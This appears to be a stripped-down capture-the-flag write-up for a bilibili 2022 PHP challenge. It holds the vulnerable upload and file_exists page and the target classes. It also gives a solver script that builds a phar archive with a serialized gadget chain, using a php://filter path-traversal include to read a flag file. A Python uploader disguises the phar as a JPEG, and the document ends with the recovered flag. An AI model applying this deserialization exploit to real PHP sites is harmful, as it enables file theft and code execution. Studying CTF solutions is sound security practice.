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| <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set('PRC');
if($_SERVER['REQUEST_METHOD']==='POST') { $filename = $_FILES['file']['name']; $temp_name = $_FILES['file']['tmp_name']; $size = $_FILES['file']['size']; $error = $_FILES['file']['error']; if ($size > 2*1024*1024){ echo "<script>alert('文件过大');window.history.go(-1);</script>"; exit(); } $arr = pathinfo($filename); $ext_suffix = $arr['extension']; $allow_suffix = array('jpg','gif','jpeg','png'); if(!in_array($ext_suffix, $allow_suffix)){ echo "<script>alert('只能是jpg,gif,jpeg,png');window.history.go(-1);</script>"; exit(); } $new_filename = date('YmdHis',time()).rand(100,1000).'.'.$ext_suffix; move_uploaded_file($temp_name, 'upload/'.$new_filename); echo "success save in: ".'upload/'.$new_filename;
} else if ($_SERVER['REQUEST_METHOD']==='GET') { if (isset($_GET['c'])){ include("5d47c5d8a6299792.php"); $fpath = $_GET['c']; if(file_exists($fpath)){ echo "file exists"; } else { echo "file not exists"; } } else { highlight_file(__FILE__); } } echo 111; ?>
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| <?php
class Modifier {
public function __invoke(){ include("index.php"); } }
class Action { protected $checkAccess; protected $id;
public function run() { if(strpos($this->checkAccess, 'upload') !== false || strpos($this->checkAccess, 'log') !== false){ echo "error path"; exit(); } if ($this->id !== 0 && $this->id !== 1) { switch($this->id) { case 0: if ($this->checkAccess) { include($this->checkAccess); } break; case 1: throw new Exception("id invalid in ".__CLASS__.__FUNCTION__); break; default: break; } } }
class Content {
public $formatters;
public function getFormatter($formatter) { if (isset($this->formatters[$formatter])) { return $this->formatters[$formatter]; } foreach ($this->providers as $provider) { if (method_exists($provider, $formatter)) { $this->formatters[$formatter] = array($provider, $formatter); return $this->formatters[$formatter]; } } throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter)); }
public function __call($name, $arguments) { return call_user_func_array($this->getFormatter($name), $arguments); } }
class Show{ public $source; public $str; public $reader; public function __construct($file='index.php') { $this->source = $file; echo 'Welcome to '.$this->source."<br>"; } public function __toString() { $this->str->reset(); }
public function __wakeup() { if(preg_match("/gopher|phar|http|file|ftp|dict|\.\./i", $this->source)) { throw new Exception('invalid protocol found in '.__CLASS__); } }
public function reset() { if ($this->reader !== null) { $this->reader->close(); } } }
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| <?php
class Action { protected $checkAccess='php://filter/convert.base64-encode/resource=../../../tmp/flag.php'; protected $id=NULL;
public function run() { if(strpos($this->checkAccess, 'upload') !== false || strpos($this->checkAccess, 'log') !== false){ echo "error path"; exit(); } if ($this->id !== 0 && $this->id !== 1) { switch($this->id) { case 0: if ($this->checkAccess) {echo 'flag!!!!'; include($this->checkAccess); } break; case 1: throw new Exception("id invalid in ".__CLASS__.__FUNCTION__); break; default: break; } } }
} class Content { public $formatters; public function __construct(){ $action=new Action; $this->formatters=array('reset'=>array($action,'run')); } public function getFormatter($formatter) { if (isset($this->formatters[$formatter])) { return $this->formatters[$formatter]; } foreach ($this->providers as $provider) { if (method_exists($provider, $formatter)) { $this->formatters[$formatter] = array($provider, $formatter); return $this->formatters[$formatter]; } } throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter)); }
public function __call($name, $arguments) { return call_user_func_array($this->getFormatter($name), $arguments); } }
class Show{ public $source; public $str; public $reader; public function __construct($file='index.php') { $this->str=new Content; $this->source = $file; echo 'Welcome to '.$this->source."<br>"; } public function __toString() { $this->str->reset(); }
@unlink("phar.phar"); $phar = new Phar("phar.phar"); $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); $o = new Show(); $o->source=new Show(); $phar->setMetadata($o); $phar->addFromString("test.txt", "test");
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| import requests file1=open('phar.phar','rb') file2=open('phar.jpg','wb') file2.write(file1.read()) file1.close() file2.close() url='' file={ "file": open('./phar.jpg','rb'), } post=requests.post(url=url,files=file) print(post.content)
| LyoqCiAqIGJpbGliaWxpQDIwMjIuCiAqIENvbmdyYXR1bGF0aW9ucyEgVGhpcyBpcyBUaGUgRmxhZyEKICogQXV0aDogSzNpb3ZlQGdpdGh1YgogKiBSZXBvOiAxMDI0LWNoZWVycwogKiBAbGluayBodHRwczovL3NlY3VyaXR5LmJpbGliaWxpLmNvbS8KICogQGxpY2Vuc2UgaHR0cHM6Ly93d3cuYmlsaWJpbGkuY29tLwogKi8KCmZsYWcye1BoQXJfVGhlX2JFc1RfTGFuZ30K
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| /** * bilibili@2022. * Congratulations! This is The Flag! * Auth: K3iove@github * Repo: 1024-cheers * @link https://security.bilibili.com/ * @license https://www.bilibili.com/ */
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